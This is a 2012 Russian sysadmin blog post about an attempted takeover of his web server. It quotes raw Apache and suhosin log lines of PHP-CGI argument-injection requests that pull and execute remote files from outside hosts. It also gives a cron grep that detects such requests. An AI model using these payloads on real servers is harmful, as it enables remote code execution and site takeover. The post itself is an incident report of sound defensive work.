Обычный день из жизни сервера

11 Май
2012

Сегодня утром, сидя с чашечкой кофе и бутербродом на кухне, и просматривая накопившуюся за ночь почту, я обнаружил одно неприятное для себя письмо. Если быть до конца точным то письмо то было обычным. Обычный лог с web сервера за прошедшие сутки. Но вот содержание лога наводило на неприятные мысли.
Наверное всем и каждому знакомо это чувство, когда тебя застукали со спущенными штанами. Вот как раз такое чувство я испытывал читая эти строки.

May 10 20:16:53 mail suhosin[31837]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=1_-d_auto_prepend_file=http://nettrans_ru/1_txt' (attacker '37.9.61.36', file 'file '/web/|||||||||||
May 10 21:36:52 mail suhosin[1625]: ALERT - configured request variable name length limit exceeded - dropped variable '-d_allow_url_include=1_-d_auto_prepend_file=http://nettrans_ru/1_txt' (attacker '37.9.61.36', file '/web/|||||||||||


Взяв себя в руки я решил разобраться что это и кто. После анализа логов были найдены интересные строчки, которые пролили немного света на эти попытки.

80.254.172.61 - - [10/May/2012:13:28:44 +0400] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://mednik75.narod2.ru/1.txt HTTP/1.1" 200 19906
177.8.168.3 - - [10/May/2012:21:23:27 +0400] "POST //?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.1" 200 22223
37.9.61.36 - - [10/May/2012:21:36:52 +0400] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://nettrans.ru/1.txt HTTP/1.0" 200 20305
37.9.61.36 - - [11/May/2012:00:09:46 +0400] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://nettrans.ru/1.txt HTTP/1.0" 301 -
37.9.61.36 - - [11/May/2012:05:33:54 +0400] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://nettrans.ru/1.txt HTTP/1.0" 200 17169
37.9.61.36 - - [11/May/2012:06:05:16 +0400] "GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://nettrans.ru/1.txt HTTP/1.0" 200 5382



Кто то пытался выполнить код удаленный код на моем сервере причем этот кто то довольно цинично сканировал все домены. После написания писем владельцам сайтов, на которых лежал 1.txt файл, я решил заглянуть на 37.9.61.36/ и обнаружил там поднятый веб сервер и несколько файлов.

Index of /

1.txt
2.txt
KeyWordKeeper.exe
Output_Unpacker/
bd.php
download.php


Изучив содержимое обнаружил в некоторых файлах это dpaste.org/6eYec/

На этом я решил закончить изучение файлов и занес все IP из списка в блэклист своего фаервола. Для себя сделал вывод что атакующий является либо ботом, либо отчасти ботом (человеком не имеющим желания сломать именно меня, а ставящим цель взломать как можно больше веб серверов).
На всякий случай для отлова таких ботов загнал себе в крон команду: cat /var/log/apache2/access_log |grep $(date +%d)/$(date +%b)/$(date +%Y):$(date +%I) |grep +auto_prepend_file% |mail -s web_stat_hourly postadmin. Которая уведомляет меня по почте в случае обнаружения подобной атаки.
К слову я уже сталкивался с подобными способами захвата сайтов. Как правило более успешные коллеги нашего бота, таки ломают старые (joomla 1.5) сайты. Как правило они меняют файл .htaccess после чего с сайта идет переадресация на их сайты. Для таких ботов я поставил специальный скрипт который мониторит именно .htaccess на наличие изменений, а затем уже разматываю клубок (чем изменен, как изменяющий код выполнен и прочее…). На сервере довольно много старых сайтов и их владельцы не спешат их обновлять. А мониторинг и отслеживание подобных уязвимостей, к сожалению ложится на мои плечи.
По материалам Хабрахабр.



загрузка...

Комментарии:

Наверх